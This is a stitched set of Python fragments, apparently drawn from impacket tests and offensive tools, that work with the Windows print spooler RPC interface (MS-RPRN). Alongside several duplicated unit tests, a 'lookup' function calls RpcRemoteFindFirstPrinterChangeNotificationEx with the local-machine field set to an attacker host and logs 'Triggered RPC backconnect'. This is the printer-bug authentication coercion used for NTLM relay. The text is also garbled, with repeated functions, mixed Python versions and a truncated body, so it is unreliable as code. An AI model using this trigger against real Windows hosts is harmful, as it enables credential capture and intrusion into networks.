def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self):
dce, rpctransport = self.connect()
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine)
try:
resp = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, resp['pHandle'], rprn.PRINTER_CHANGE_ADD_JOB, pszLocalMachine = '\\\\%s\x00' % self.machine )
resp.dump()
except Exception as e:
if str(e).find('ERROR_INVALID_HANDLE') < 0:
raise
def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self):
dce, rpctransport = self.connect()
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine)
try:
resp = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, resp['pHandle'], rprn.PRINTER_CHANGE_ADD_JOB, pszLocalMachine = '\\\\%s\x00' % self.machine )
resp.dump()
except Exception as e:
if str(e).find('ERROR_INVALID_HANDLE') < 0:
raise
def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self):
dce, rpctransport = self.connect()
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % self.machine)
with assertRaisesRegex(self, rprn.DCERPCSessionError,
"ERROR_INVALID_HANDLE"):
rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
dce,
resp['pHandle'],
rprn.PRINTER_CHANGE_ADD_JOB,
pszLocalMachine="\\\\%s\x00" % self.machine)
def call_open_printer(dce):
global debug
logging.info("getting context handle...")
try:
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
if debug == True:
logging.debug("raw response: ")
resp.dump()
logging.debug("handle is: %s" % binascii.hexlify(resp['pHandle']))
except Exception as e:
logging.error("exception " + str(e))
dce.disconnect()
sys.exit()
return resp['pHandle']
def lookup(self, rpctransport, host):
if self.__tcp_ping and self.ping(host) is False:
logging.info("Host is offline. Skipping!")
return
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except Exception as e:
# Probably this isn't a Windows machine or SMB is closed
logging.error("Timeout - Skipping host!")
return
dce.bind(rprn.MSRPC_UUID_RPRN)
logging.info('Bind OK')
try:
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
logging.error('Connection failed - skipping host!')
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
logging.error('Access denied - RPC call was denied')
dce.disconnect()
return
else:
raise
logging.info('Got handle')
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
request['pOptions'] = NULL
try:
resp = dce.request(request)
except Exception as e:
print(e)
logging.info(
'Triggered RPC backconnect, this may or may not have worked')
dce.disconnect()
return None
def lookup(self, rpctransport, host):
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(rprn.MSRPC_UUID_RPRN)
logging.critical('Bind OK')
try:
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
logging.error('Connection failed - skipping host!')
return False
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
logging.error('Access denied - RPC call was denied')
dce.disconnect()
return False
else:
return False
def test_hRpcClosePrinter(self):
dce, rpctransport = self.connect()
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine)
resp.dump()
resp = rprn.hRpcClosePrinter(dce, resp['pHandle'])
resp.dump()
def test_hRpcClosePrinter(self):
dce, rpctransport = self.connect()
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine)
resp.dump()
resp = rprn.hRpcClosePrinter(dce, resp['pHandle'])
resp.dump()
